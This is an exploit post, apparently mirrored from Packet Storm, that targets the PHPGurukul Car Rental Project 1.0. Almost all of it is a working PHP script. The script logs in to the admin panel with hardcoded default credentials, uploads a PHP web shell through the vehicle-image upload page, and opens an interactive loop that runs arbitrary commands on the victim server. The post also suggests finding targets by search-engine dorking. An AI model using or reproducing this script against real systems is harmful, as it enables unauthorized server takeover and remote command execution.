Share
## https://sploitus.com/exploit?id=PACKETSTORM:181761
=============================================================================================================================================  
| # Title : Car Rental Project 1.0 php code injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://phpgurukul.com/car-rental-project-php-mysql-free-download/ |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] This PHP code is designed to create a file and inject PHP code.  
  
[+] save payload as poc.php   
  
[+] usage : C:\www\test>php poc.php 127.0.0.1  
  
[+] payload :   
  
<?php  
  
echo "  
+-------------------------------------------------------------+  
Car Rental Project v1.0 - php Code injection  
  
by indoushka  
+-------------------------------------------------------------+  
";  
  
// Function to log in and execute RCE  
function login($rhosts) {  
  
$session = curl_init();  
  
$bigstring = "\n+-------------------------------------------------------------+\n";  
echo "+-------------------------------------------------------------+\n";  
echo "[+] Victim host: " . $rhosts . "\n";  
  
$post_auth_login = "http://" . $rhosts . "/carrentalproject/carrental/admin/index.php";  
$shell_upload_url = "http://" . $rhosts . "/carrentalproject/carrental/admin/changeimage1.php";  
  
// Login / Authentication  
$post_data = [  
'username' => 'admin',  
'password' => 'Test@12345',  
'login' => ''  
];  
  
// Initiating a cURL request for login  
curl_setopt($session, CURLOPT_URL, $post_auth_login);  
curl_setopt($session, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($session, CURLOPT_POST, true);  
curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($post_data));  
curl_setopt($session, CURLOPT_COOKIEFILE, "cookie.txt"); // Store cookies in a file  
  
$login_response = curl_exec($session);  
  
// Get the HTTP response code  
$http_code = curl_getinfo($session, CURLINFO_HTTP_CODE);  
if ($http_code == 200) {  
echo "[+] Login HTTP response code: 200\n";  
echo "[+] Successfully logged in\n";  
} else {  
echo "[!] Failed to authenticate\n";  
exit;  
}  
  
// Proxy settings (optional, for Burp)  
$proxies = [  
"http" => "http://127.0.0.1:8080",  
"https" => "http://127.0.0.1:8080"  
];  
  
// Data for uploading the backdoor  
$backdoor_file = new CURLFile('1dccadfed7bcbb036c56a4afb97e906f.php', 'application/x-php', '<?php system($_GET["cmd"]); ?>');  
  
$upload_data = [  
'img1' => $backdoor_file,  
'update' => ''  
];  
  
// Attempt to upload the PHP shell  
curl_setopt($session, CURLOPT_URL, $shell_upload_url);  
curl_setopt($session, CURLOPT_POST, true);  
curl_setopt($session, CURLOPT_POSTFIELDS, $upload_data);  
  
$upload_response = curl_exec($session);  
  
if ($upload_response) {  
echo "[+] Backdoor upload at /carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php" . $bigstring;  
} else {  
echo "[!] Failed to upload backdoor\n";  
exit;  
}  
  
// Command Execution Loop  
while (true) {  
echo "Command RCE >> ";  
$command = trim(fgets(STDIN));  
  
$shell_location = "http://" . $rhosts . "/carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php?cmd=" . urlencode($command);  
  
// Execute the command  
curl_setopt($session, CURLOPT_URL, $shell_location);  
curl_setopt($session, CURLOPT_RETURNTRANSFER, true);  
$response = curl_exec($session);  
  
echo $response . "\n";  
}  
  
// Close cURL session  
curl_close($session);  
}  
  
if ($argc < 2) {  
echo "Usage: php script.php [target_host]\n";  
exit;  
}  
  
// Call the login function with the provided host  
login($argv[1]);  
  
?>  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================